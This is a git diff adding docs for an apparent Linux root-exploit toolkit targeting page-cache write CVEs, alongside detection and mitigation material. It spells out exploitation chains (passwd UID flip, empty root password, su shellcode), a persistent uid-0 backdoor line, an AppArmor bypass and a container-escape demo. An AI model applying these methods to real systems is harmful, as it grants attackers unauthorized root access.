2026-05-16: works 5/5 on lts-6.12.88 (no anti-EntryBleed +mitigation configured). See +`security-research/findings/audit_io_uring_2026-05-16_poc_attempt.md` +and the EntryBleed test code at +`SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` lines ~73-150. + +## Upstream patches + +There is no single canonical patch. Partial mitigations include: +- `CONFIG_RANDOMIZE_KSTACK_OFFSET` (per-syscall kernel stack jitter) +- Some KPTI hardening discussions on lkml, no merged fix as of + lts-6.12.88 +- The community position remains that "KASLR is best-effort, + not a security boundary" + +## Implementation plan + +- Lift the proven EntryBleed code from + `SKYFALL/bugs/leak_write_modprobe_2026-05-16/exploit.c` into + `module.c` here +- Expose as both a CLI mode (`iamroot --leak-kbase`) and as a + library helper (`uint64_t entrybleed_leak_kbase(void)`) +- Detection rules: timing-attack pattern flags, perf-counter + anomaly detection (informational β€” these are hard to make precise + without false positives) + +## Not started yet + +Phase 3. diff --git a/modules/_stubs/fragnesia_TBD/MODULE.md b/modules/_stubs/fragnesia_TBD/MODULE.md new file mode 100644 index 0000000..16f71b4 --- /dev/null +++ b/modules/_stubs/fragnesia_TBD/MODULE.md @@ -0,0 +1,27 @@ +# Fragnesia β€” CVE pending + +> βšͺ **PLANNED** stub. See [`../../ROADMAP.md`](../../ROADMAP.md) +> Phase 7+. + +## Summary + +ESP shared-frag in-place encrypt path can be coerced into writing +into the page cache of an unrelated file. Same primitive shape as +Dirty Frag, different reach. + +## Status + +Audit-stage. See +`security-research/findings/audit_leak_write_modprobe_backups_2026-05-16.md` +section on backup primitives. Notably: trigger appears to require +CAP_NET_ADMIN inside a userns netns. On kCTF (shared net_ns) that's +cap-dead, but on host systems where user_ns clone is enabled it's +reachable. + +## Decision needed before implementing + +Is the unprivileged-userns-netns scenario in scope for IAMROOT? If +yes, this module ships. If we restrict to "default Linux user +account, no namespace tricks," this module is out of scope. + +## Not started. diff --git a/modules/copy_fail_family/MODULE.md b/modules/copy_fail_family/MODULE.md new file mode 100644 index 0000000..7045c59 --- /dev/null +++ b/modules/copy_fail_family/MODULE.md @@ -0,0 +1,1243 @@ +# DIRTYFAIL + +> A unified detector and PoC harness for the **Copy Fail** and **Dirty Frag** +> Linux page-cache write vulnerability families. + +``` + β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•—β–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•—β–ˆβ–ˆβ•— + β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β•šβ•β•β–ˆβ–ˆβ•”β•β•β•β•šβ–ˆβ–ˆβ•— β–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•”β•β•β•β•β•β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•—β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•— β–ˆβ–ˆβ•‘ β•šβ–ˆβ–ˆβ•”β• β–ˆβ–ˆβ•”β•β•β• β–ˆβ–ˆβ•”β•β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ + β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•”β•β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘ β–ˆβ–ˆβ•‘β–ˆβ–ˆβ•‘β–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ–ˆβ•— + β•šβ•β•β•β•β•β• β•šβ•β•β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β• β•šβ•β•β•šβ•β•β•šβ•β•β•β•β•β•β• +``` + +DIRTYFAIL is a small, well-documented C tool for security researchers. +It detects whether a Linux host is vulnerable to the three CVEs in this +family, and β€” with explicit, typed confirmation β€” runs a real +proof-of-concept that drops the caller into a root shell on a +vulnerable system. + +| CVE / variant | Name | DIRTYFAIL coverage | +|---|---|---| +| **CVE-2026-31431** | Copy Fail (algif_aead `authencesn` page-cache write) | Detect + full PoC | +| **CVE-2026-43284 v4** | Dirty Frag β€” IPv4 xfrm-ESP page-cache write | Detect + full PoC | +| **CVE-2026-43284 v6** | Dirty Frag β€” IPv6 xfrm-ESP page-cache write (`esp6`) | Detect + full PoC | +| **CVE-2026-43500** | Dirty Frag β€” RxRPC page-cache write | Detect + full PoC | +| Copy Fail GCM variant | xfrm-ESP `rfc4106(gcm(aes))` page-cache write | Detect + full PoC | + +**Bonus modes:** + +- **`--scan --active`** β€” sentinel-STORE active probes. Default `--scan` + reports per-CVE preconditions (kernel, modules, LSM state) plus an + active probe of the Copy Fail primitive. Adding `--active` extends + the sentinel-file STORE probe to all four other primitives (ESP v4, + ESP v6, RxRPC, GCM): each fires the kernel trigger against a `/tmp` + sentinel and reports VULNERABLE only if the marker bytes actually + land. This is the only way to distinguish a backported-patched + kernel (preconds say vulnerable but probe says intact) from an + unpatched one without running the full exploit. `/etc/passwd` is + never touched. Auto-calibrates V6 STORE shift per kernel build. +- **`--exploit-backdoor`** β€” persistent uid-0 backdoor: length-matched + overwrite of a `nologin`/`false`/`sync` line in `/etc/passwd` with + `dirtyfail::0:0::/:/bin/bash`. Survives shell exit until page + is evicted. State stashed at `/var/tmp/.dirtyfail.state` for + `--cleanup-backdoor`. The `dirtyfail` username is deliberately + matched to this project so it's instantly identifiable in any + audit β€” change `NEW_USER` in `src/backdoor.c` if you need a + different identifier for an authorized red-team engagement. +- **AppArmor bypass** β€” defeats Ubuntu's + `apparmor_restrict_unprivileged_userns=1` policy via a single-hop + `change_onexec("crun")` re-exec into an unconfined profile that + retains userns capabilities. Each exploit mode handles this + internally via a fork: parent stays in init namespace, child does + the bypass dance, parent reads global page cache and runs `su` for + REAL init-ns root. The legacy `--aa-bypass` flag still exists for + debugging the bypass mechanics in isolation. See [Β§8.5 Architecture](#85-architecture-outerinner-fork-based-bypass). + +## Verified working on + +DIRTYFAIL has been **empirically validated end-to-end** across multiple +distros and kernel versions. The matrix below reflects per-mode test +results from running each `--exploit-*` mode against a fresh install +of each distro. + +| Distro | Kernel | LSM | Copy Fail | xfrm-ESP v4 | xfrm-ESP v6 | RxRPC | GCM | Backdoor | SU shellcode | +|---|---|---|:-:|:-:|:-:|:-:|:-:|:-:|:-:| +| Ubuntu 24.04 LTS | `6.8.0-111-generic` | AppArmor | πŸ›‘Β² | βœ… | βœ… | βœ… | βœ…ΒΉ | βœ…ΒΉ | (not tested) | +| Debian 13.4 | `6.12.86+deb13` | none | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘ | πŸ›‘β΅ | +| AlmaLinux 10.1 | `6.12.0-124.8.1.el10_1` | SELinux | βœ… | βœ… | βœ… | ⏭³ | βœ… | βœ… | βœ… | +| Fedora 44 (Server) | `6.19.10-300.fc44` | SELinux | βœ… | βœ… | βœ… | βœ… | βœ… | βœ… | βœ… | +| Ubuntu 26.04 LTS | `7.0.0-15-generic` | AppArmor (hardened) | πŸ›‘ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΄ | πŸ›‘β΅ | + +**Legend:** βœ… exploit landed and produced real init-ns root Β· πŸ›‘ mitigated β€” exploit cannot reach kernel bug (kernel patched OR LSM blocks unprivileged path) Β· ⏭ not applicable (precondition missing) + +### Active-probe validation (`--scan --active`) + +The `--active` flag adds a sentinel-file STORE probe per CVE during +detection. We validated the probe outputs against the same 4 distros +above (Debian, Fedora, AlmaLinux, Ubuntu 26.04) β€” the matrix below +shows the per-mode probe verdict and matches the full-exploit +ground-truth one-for-one: + +| Distro | Copy Fail probe | ESP v4 probe | ESP v6 probe | RxRPC probe | GCM probe | +|---|:-:|:-:|:-:|:-:|:-:| +| Debian 13.4 | intact πŸ›‘ | intact πŸ›‘ | intact πŸ›‘ | intact πŸ›‘ | intact πŸ›‘ | +| Fedora 44 | marker @0 βœ… | STORE @0 βœ… | STORE @8 βœ… | byte change βœ… | sentinel[0] 0x41β†’0x27 βœ… | +| AlmaLinux 10.1 | marker @0 βœ… | STORE @0 βœ… | STORE @8 βœ… | preconds ⏭ | sentinel changed βœ… | +| Ubuntu 26.04 | intact πŸ›‘ | LSM-blocked πŸ›‘ | LSM-blocked πŸ›‘ | LSM-blocked πŸ›‘ | LSM-blocked πŸ›‘ | + +The V6 probe's STORE landing offset (8 on Fedora and Alma) matches the +empirical `V6_STORE_SHIFT` that `calibrate_v6_shift()` discovers at +runtime β€” confirming the auto-calibration replaces the previously +hard-coded constant correctly across kernel builds. + +ΒΉ GCM and Backdoor require `algif_aead` to be loadable. Ubuntu 24.04 +ships `/etc/modprobe.d/disable-algif_aead.conf` blacklisting it as a +Copy Fail mitigation. With the blacklist removed (e.g. on a kernel +predating the mitigation), both modes work end-to-end. + +Β² Copy Fail's algif_aead path is mitigated by the modprobe blacklist; +the underlying CVE primitive in the kernel is the same whether +`authencesn` is reachable. xfrm-ESP, RxRPC, and the GCM variant all +land on the same kernel because they don't go through algif_aead. + +Β³ AlmaLinux 10's `kernel-modules-extra` package is not installed by +default on a Minimal install, so `rxrpc.ko` is missing on disk. +Installing `kernel-modules-extra-$(uname -r)` from EPEL or the AlmaLinux +extras repo brings the module back; on a stock minimal install RxRPC is +unreachable. + +⁴ **Ubuntu 26.04 LTS comprehensively blocks unprivileged exploitation.** +The shipping kernel `7.0.0-15.15` (released 2026-04-22) **predates the +mainline patch `f4c50a4034e6` (merged 2026-05-07) by ~2 weeks** β€” so +the bug IS still present in the kernel. Ubuntu's defense is +**defense-in-depth via AppArmor hardening**, not a kernel patch: + +- `apparmor_restrict_unprivileged_userns=1` is enabled by default. +- On `unshare(CLONE_NEWUSER)`, the kernel-level AppArmor enforcement + auto-transitions ANY profile (including `(unconfined)`-flagged ones + like `crun`, `chrome`, default `unconfined`) to a + `//&unprivileged_userns (mixed)` sub-profile that has + `audit deny capability`. uid 0 inside the new userns gets no caps. +- `change_onexec` to a different profile doesn't help β€” even the + `crun` profile (which has explicit `userns,` permission and + `flags=(unconfined)`) auto-transitions on unshare. Verified via + `aa-exec -p crun bash -c 'unshare -U -n cat /proc/self/attr/current'` + β†’ `crun//&unprivileged_userns (mixed)`. +- `newuidmap`/`newgidmap` (setuid root) successfully writes uid_map, + but `setresuid(0)` then succeeds while `ioctl(SIOCSIFFLAGS)` and + every other CAP_NET_ADMIN-gated syscall returns EPERM because the + capability denial is per-namespace, not per-uid. + +The DIRTYFAIL binary correctly armes its bypass and reaches stage 2, +but cannot acquire CAP_NET_ADMIN inside the new userns. The exploit +infrastructure is blocked at the LSM layer regardless of bypass +technique. We tested `change_onexec(crun)`, `change_onexec(chrome)`, +`aa-exec -p `, and direct `unshare(USER|NET) + newuidmap` +β€” all produce the same `unprivileged_userns` sub-profile. + +**This is good security work by Canonical.** The bug class is +mitigated for unprivileged users without requiring a kernel rebuild. +A subsequent stable update will likely also bring the kernel patch +proper, completing the defense. + +⁡ **`--exploit-su` shellcode injection** depends on the same Copy Fail +algif_aead 4-byte primitive (`cf_4byte_write`). On kernels where +Copy Fail is patched (Debian 13.4) or LSM-blocked (Ubuntu 26.04 β€” but +the algif_aead path was also patched in 7.0.0-15), the plant runs +through but the verify step fails ("page cache does not match planted +shellcode") and the auto-revert restores `/usr/bin/su`. Tested +end-to-end on AlmaLinux 10.1 (entry point at file offset `0x45b0`) +and Fedora 44 (offset `0x1b60`); ELF parser handles each distro's +PIE base independently. Real-root proof on Fedora 44: +`uid=0(root) gid=0(root) ... context=unconfined_u:unconfined_r:unconfined_t`. + +Test reproducibility: + +- We re-installed each distro from a clean ISO, set up SSH key auth + NOPASSWD sudo, cloned and built DIRTYFAIL on each, took a `clean-build` Parallels snapshot, then ran all 5 exploit modes with `--no-shell` (auto-revert via fadvise + drop_caches). +- Empirical result rows are derived from parsing the actual `--exploit-*` output, looking for the success signals: `page cache now reports with uid 0`, `root password field is now empty`, `is now uid 0` (backdoor), or any of the failure patterns (`write did not land`, `byte flip failed`, `setresuid: Invalid`, `add_rxrpc_key: No such device`, `page cache not in expected shape`). +- For the RxRPC and Backdoor "real root" verification we drove `echo "" | su - root` / `echo "" | su - dirtyfail` and confirmed `uid=0(root)` plus successful read of `/etc/shadow`. + +> **Authorized testing only.** Use DIRTYFAIL only on systems you own or +> are explicitly engaged to assess. The exploit modes corrupt +> `/etc/passwd` *in the kernel page cache* (the on-disk file is never +> touched). Cleanup is `dirtyfail --cleanup` or +> `echo 3 > /proc/sys/vm/drop_caches`. + +--- + +## Table of contents + +1. [The bug class](#1-the-bug-class) +2. [CVE-2026-31431 β€” Copy Fail](#2-cve-2026-31431--copy-fail) +3. [CVE-2026-43284 β€” Dirty Frag (xfrm-ESP)](#3-cve-2026-43284--dirty-frag-xfrm-esp) +4. [CVE-2026-43500 β€” Dirty Frag (RxRPC)](#4-cve-2026-43500--dirty-frag-rxrpc) + - [4.5 Architecture overview](#45-architecture-overview) +5. [Build](#5-build) +6. [Usage](#6-usage) +7. [How DIRTYFAIL detects each CVE](#7-how-dirtyfail-detects-each-cve) +8. [How DIRTYFAIL exploits each CVE](#8-how-dirtyfail-exploits-each-cve) + - [8.5 Architecture: outer/inner fork-based bypass](#85-architecture-outerinner-fork-based-bypass) +9. [Mitigations](#9-mitigations) +10. [Ethics & disclosure](#10-ethics--disclosure) +11. [Credits](#11-credits) + +**Companion docs:** +- [`docs/DEFENDERS.md`](docs/DEFENDERS.md) β€” sysadmin playbook: am I vulnerable, how to mitigate, what to monitor. +- [`docs/RESEARCH.md`](docs/RESEARCH.md) β€” kernel-source audit of adjacent paths (AH, IPCOMP, MACsec, kTLS, etc.) for the same bug class. +- [`tools/dirtyfail-check.sh`](tools/dirtyfail-check.sh) β€” standalone bash detector for sysadmins (no compilation needed). +- [`tools/99-dirtyfail.rules`](tools/99-dirtyfail.rules) β€” ready-to-load auditd rules for the exploit chain. +- [`tools/dirtyfail-container-escape.sh`](tools/dirtyfail-container-escape.sh) β€” cross-namespace blast-radius demo. +- [`tools/exploit_su_aarch64.S`](tools/exploit_su_aarch64.S) β€” aarch64 (ARM64) shellcode source for `--exploit-su`. Hardware-untested; ships gated behind `DIRTYFAIL_AARCH64_TRUST_UNTESTED=1`. Regenerate the corresponding bytes in `src/exploit_su.c` with `aarch64-linux-gnu-as` to verify. + +--- + +## 1. The bug class + +**Page-cache write** vulnerabilities let an unprivileged user modify +the kernel's in-memory copy of a file they only have read access to. +The on-disk file is never written; the modification persists in RAM +until the page is evicted (`drop_caches`, memory pressure, or reboot). + +This class started with **Dirty Pipe** (CVE-2022-0847), which abused +`pipe_buffer` flags. Copy Fail and Dirty Frag are descendants that +target the `frag` member of `struct sk_buff` instead. The mechanism is +always the same: + +1. Userspace `splice()`s a page-cache page from a readable file (e.g. + `/etc/passwd`, `/usr/bin/su`) into the frag of a kernel buffer. +2. A receive path runs **in-place** crypto on that buffer β€” the same + pages are both source and destination of the operation. +3. The crypto routine performs a "scratch" STORE outside the data + region (a sequence-number rearrangement, a single-block decrypt, + etc.) that lands inside the user-pinned page. +4. The page-cache copy of the file is now permanently modified for + every reader on the host, until the page is evicted. + +Because the bug is a **deterministic logic flaw**, not a race, success +rates are essentially 100% and the kernel does not panic on failure. + +--- + +## 2. CVE-2026-31431 β€” Copy Fail + +* Disclosure: **2026-04-29** +* Site: +* Original PoC (C): [Smarttfoxx/copyfail](https://github.com/Smarttfoxx/copyfail) +* Original PoC (Python): [rootsecdev/cve_2026_31431](https://github.com/rootsecdev/cve_2026_31431) +* Introduced by commit: `72548b093ee3` (2017) +* Fixed by commit: `a664bf3d` (mainline 6.12 / 6.17 / 6.18 stables) +* Confirmed affected: Ubuntu 24.04 LTS, Amazon Linux 2023, RHEL 14.3, SUSE 16 + +### Root cause + +The kernel's `algif_aead` module exposes the AEAD crypto API to +userspace via `AF_ALG`. The `authencesn(hmac(sha256), cbc(aes))` +template implements RFC-4303 ESN (Extended Sequence Numbers); part of +its decryption path performs a **4-byte scratch write** to rearrange +the sequence number: + +```c +static int crypto_authenc_esn_decrypt(struct aead_request *req) +{ + /* Move high-order bits of sequence number to the end. */ + scatterwalk_map_and_copy(tmp, src, 0, 8, 0); + if (src == dst) { + scatterwalk_map_and_copy(tmp, dst, 4, 4, 1); + scatterwalk_map_and_copy(tmp + 1, dst, assoclen + cryptlen, 4, 1); // β˜… + ... +``` + +The STORE at β˜… is harmless on a normal IPsec packet β€” it lands inside +the skb's tag area, which is kernel-owned. The crypto template +**assumes** `src` and `dst` point into kernel memory. + +`algif_aead` violates that assumption. It accepts `splice()` from +userspace, which plants page-cache pages into the request's +scatterlist. Because the AEAD runs in-place (`req->dst = req->src`), +the page-cache page now sits at the destination scatterlist offset +that the scratch write targets. + +The 4 bytes that get written are bytes 4..7 of the AAD that userspace +sent β€” the "seqno_lo" field of an ESP header, which the attacker fills +with whatever they want. + +**Net primitive**: 4-byte arbitrary-offset write into the page cache +of any file the attacker can `open(O_RDONLY)`. + +### Exploitation + +The simplest weaponization is in `/etc/passwd`. A normal user line +looks like: + +``` +kara:x:1000:1000:Kara,,,:/home/kara:/bin/bash +``` + +Flipping `1000` (the UID field, exactly 4 ASCII bytes for any UID +1000–9999) to `0000` makes glibc's `getpwnam()` report uid=0 for +that user. PAM, however, still authenticates against the on-disk +`/etc/shadow` (which is untouched), so `su ` prompts for the +real password, validates it, then `setuid(0)` β€” and lands at root +because the page-cache copy of `/etc/passwd` says we are root. + +`/etc/shadow` integrity is preserved. On-disk `/etc/passwd` is +preserved. Only the kernel's RAM copy of `/etc/passwd` is corrupted, +and only until `drop_caches` or reboot. + +--- + +## 3. CVE-2026-43284 β€” Dirty Frag (xfrm-ESP) + +* Disclosure: **2026-04-30 β†’ 2026-05-08** +* Original PoC (C): [V4bel/dirtyfrag](https://github.com/V4bel/dirtyfrag) +* Researcher: Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) +* Introduced by commit: `cac2661c53f3` (2017-01-17) +* Fixed by commit: `f4c50a4034e6` (mainline net.git, merged 2026-05-07) +* Confirmed affected: Ubuntu 24.04, RHEL 10.1, openSUSE Tumbleweed, + CentOS Stream 10, AlmaLinux 10, Fedora 44 + +### Root cause + +`esp_input()` is supposed to call `skb_cow_data()` before in-place AEAD +decryption when an skb is non-linear (i.e. has frags). The code path +has a short-circuit: + +```c +if (!skb_cloned(skb)) { + if (!skb_is_nonlinear(skb)) { + nfrags = 1; + goto skip_cow; + } else if (!skb_has_frag_list(skb)) { // β˜… bug + nfrags = skb_shinfo(skb)->nr_frags; + nfrags++; + goto skip_cow; + } +} +``` + +If the skb has frags but no `frag_list`, esp_input bypasses +`skb_cow_data` and hands the user-supplied frag straight to the AEAD +template. The same `authencesn(...)` scratch write that powers Copy +Fail then lands at file offset `(assoclen + cryptlen)` of the spliced +page. + +The 4 STOREd bytes are `seq_hi` from the SA's `replay_esn` state β€” +attacker-controlled at SA registration time via the +`XFRMA_REPLAY_ESN_VAL` netlink attribute. + +**Cost**: registering an XFRM SA needs `CAP_NET_ADMIN`, so the +attacker enters a fresh user namespace via `unshare(CLONE_NEWUSER)` +first. This is allowed by default on most distros (Ubuntu's hardened +profile is the notable exception). + +**Crucially, this primitive works even when the algif_aead Copy Fail +mitigation is in place** β€” the xfrm path doesn't go through algif_aead. +A defender who only blacklisted `algif_aead` is still vulnerable to +Dirty Frag. + +### Exploitation + +V4bel's published PoC writes a 192-byte static "root-shell" ELF over +the first 192 bytes of `/usr/bin/su`'s page cache, using 48 sequential +4-byte STOREs. After modification, `execve("/usr/bin/su")` runs the +new ELF entry point with the setuid-root bit intact, drops PAM +entirely, and `execve("/bin/sh")` from inside the shellcode. + +DIRTYFAIL takes the simpler `/etc/passwd` UID-flip approach (one +4-byte STORE β€” the same target as Copy Fail) for two reasons: + +1. It is a single-write primitive demonstration, easier to study. +2. It is fully reversible with `POSIX_FADV_DONTNEED` and does not + leave `/usr/bin/su` in a corrupt state for other users on the + system. + +--- + +## 4. CVE-2026-43500 β€” Dirty Frag (RxRPC) + +* Disclosure: **2026-04-29 β†’ 2026-05-08** +* Patch: not in any tree as of 2026-05-08; researcher's patch + pending: `lore.kernel.org/all/afKV2zGR6rrelPC7@v4bel/` +* Researcher: Hyunwoo Kim ([@v4bel](https://x.com/v4bel)) +* Introduced by commit: `2dc334f1a63a` (2023-06) + +### Root cause + +`rxkad_verify_packet_1()` performs an **in-place** `pcbc(fcrypt)` +single-block decryption on the first 8 bytes of an RxRPC data packet: + +```c +sg_init_table(sg, ARRAY_SIZE(sg)); +ret = skb_to_sgvec(skb, sg, sp->offset, 8); +memset(&iv, 0, sizeof(iv)); +skcipher_request_set_crypt(req, sg, sg, 8, iv.x); // β˜… src == dst +ret = crypto_skcipher_decrypt(req); // β˜… 8-byte STORE +``` + +If a page-cache page has been spliced into the skb's frag, the 8-byte +decrypt is performed on top of it. + +**Difference from xfrm-ESP**: the 8 bytes that get STOREd are +`fcrypt_decrypt(C, K)`, where `C` is the existing ciphertext at that +file offset and `K` is the session key from an RxRPC v1 token the +attacker registered via `add_key("rxrpc", ...)`. The attacker doesn't +control the STORE value directly β€” they have to brute-force `K` until +`fcrypt_decrypt(C, K)` produces the desired plaintext. + +`fcrypt` is an Andrew File System cipher with a **56-bit key** and +8-byte block. It is deterministic; it ports cleanly to user space; and +its key space is small enough that a constrained 8-byte target can be +brute-forced in milliseconds to seconds depending on the constraint +budget. + +**Crucially, this path does NOT need namespace privileges** β€” +`add_key`, `socket(AF_RXRPC)`, `socket(AF_ALG)`, `splice` are all +available to any unprivileged user. RxRPC fills the gap on Ubuntu's +hardened-userns profile (where xfrm-ESP is blocked) because +`rxrpc.ko` ships in the default Ubuntu build. + +### Exploitation + +The full exploit: + +1. Brute-force `K_A`, `K_B`, `K_C` in user-space such that the three + STOREs at `/etc/passwd` offsets 4, 6, 8 produce + `"::"`, `"0:"`, `"0:GGGGGG:"` respectively (last-write-wins). +2. For each `K_i`, register an RxRPC v1 token with `add_key`, perform + a forged AF_RXRPC handshake against a fake UDP server in the same + process, and trigger `rxkad_verify_packet_1` via splice. +3. The page-cache copy of `/etc/passwd` line 1 is now + `root::0:0:GGGGGG:/root:/bin/bash` β€” an empty password field. +4. PAM with `pam_unix.so nullok` accepts the empty password; `su -` + drops a root shell. + +### DIRTYFAIL coverage + +DIRTYFAIL ships **both** detection and a full PoC for this CVE. + +The DIRTYFAIL implementation lives in `src/dirtyfrag_rxrpc.c` and +`src/fcrypt.c`: + +- **fcrypt cipher** (`fcrypt.c`): 56-bit key, 8-byte block, 16-round + Feistel; standard rxkad protocol S-boxes. Includes a single-core + brute-force harness (~18 Mops/s) that searches the key space until + a candidate plaintext satisfies a caller-supplied predicate. +- **rxkad checksum** (`compute_csum_iv`, `compute_cksum`): kernel + formula reproduced via AF_ALG `pcbc(fcrypt)` so that the wire cksum + in our forged DATA packet passes `rxkad_verify_packet`'s gate. +- **RxRPC v1 token build** (`build_rxrpc_v1_token`): XDR-encoded + rxkad token registered via `add_key("rxrpc", ...)` with our + brute-forced session key. +- **AF_RXRPC client + UDP fake-server**: the client initiates a call, + the fake-server extracts (epoch, cid, callNumber) from the first + packet and emits a forged CHALLENGE so the client primes + `conn->rxkad.cipher` with our key. +- **Splice trigger** (`do_one_trigger`): vmsplice forged DATA wire + header β†’ splice 8 bytes from `/etc/passwd` β†’ splice pipe β†’ udp_srv + β†’ recvmsg drives kernel through `rxkad_verify_packet_1` β†’ 8-byte + STORE. +- **3-splice chain with chained-ciphertext correction**: brute force + K_A / K_B / K_C, applying the chained ciphertext shift between + passes (after splice A overwrites bytes 4..11, splice B's + ciphertext at 6..13 starts with `P_A[2..7]`; same for C against B). + +The final PoC reshapes `/etc/passwd` line 1 to: + +``` +root::0:0:GGGGG:/root:/bin/bash +``` + +β€” empty password field β€” and `execlp("su", "-")` then drops a root +shell because `pam_unix.so nullok` accepts an empty password. + +For comparison and verification against the upstream PoC, see +V4bel's `exp.c`: . + +--- + +## 4.5 Architecture overview + +DIRTYFAIL is a single C binary built from ~10 source modules. The +high-level structure: + +``` + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ dirtyfail (CLI) β”‚ + β”‚ src/dirtyfail.c β€” argv β†’ mode dispatch β”‚ + β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ β”‚ β”‚ β”‚ β”‚ β”‚ + β–Ό β–Ό β–Ό β–Ό β–Ό β–Ό + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ --scan β”‚ β”‚ --exploit-* β”‚ β”‚ --backdoor β”‚ β”‚--mitigateβ”‚ β”‚ --cleanup* β”‚ + β”‚ (detect.c) β”‚ β”‚ (5 modes) β”‚ β”‚ install + β”‚ β”‚ defense β”‚ β”‚ revert β”‚ + β”‚ β”‚ β”‚ β”‚ β”‚ cleanup β”‚ β”‚ β”‚ β”‚ β”‚ + β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”˜ β””β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ β”‚ β”‚ β”‚ + β”‚ β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”Όβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ β”‚ β”‚ β”‚ + β–Ό β–Ό β–Ό β–Ό + β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” β”Œβ”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β”€β” + β”‚ apparmor_ β”‚ β”‚ outer (init ns) β”‚ β”‚ cfg_1byte_write β”‚ + β”‚ bypass.c β”‚ β”‚ β†’ fork β†’ child β”‚ β”‚ (gcm primitive) β”‚ + β”‚ β”‚ β”‚ outer/inner β”‚ β”‚ β”‚ + β”‚ * sysctl β”‚ β”‚ split β”‚ β”‚ used by gcm + β”‚ + β”‚ * caps_blocked β”‚ β”‚ β”‚ backdoor for β”‚ + β”‚ * fork_arm β”‚ β”‚ parent stays β”‚ β”‚ arbitrary-byte β”‚ + β””β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”˜ β”‚ in init ns, β”‚ β”‚ writes β”‚ + β”‚ β”‚ child re-execs β”‚ β””β”€β”€β”€β”€β”€β”€β”€β”€β”¬β”€β”€β”€β”€β”€β”€β”€β”€β”€β”˜ + β”‚ β”‚ via change_ β”‚ β”‚ + β–Ό β”‚ onexec(crun) + β”‚ β–Ό + 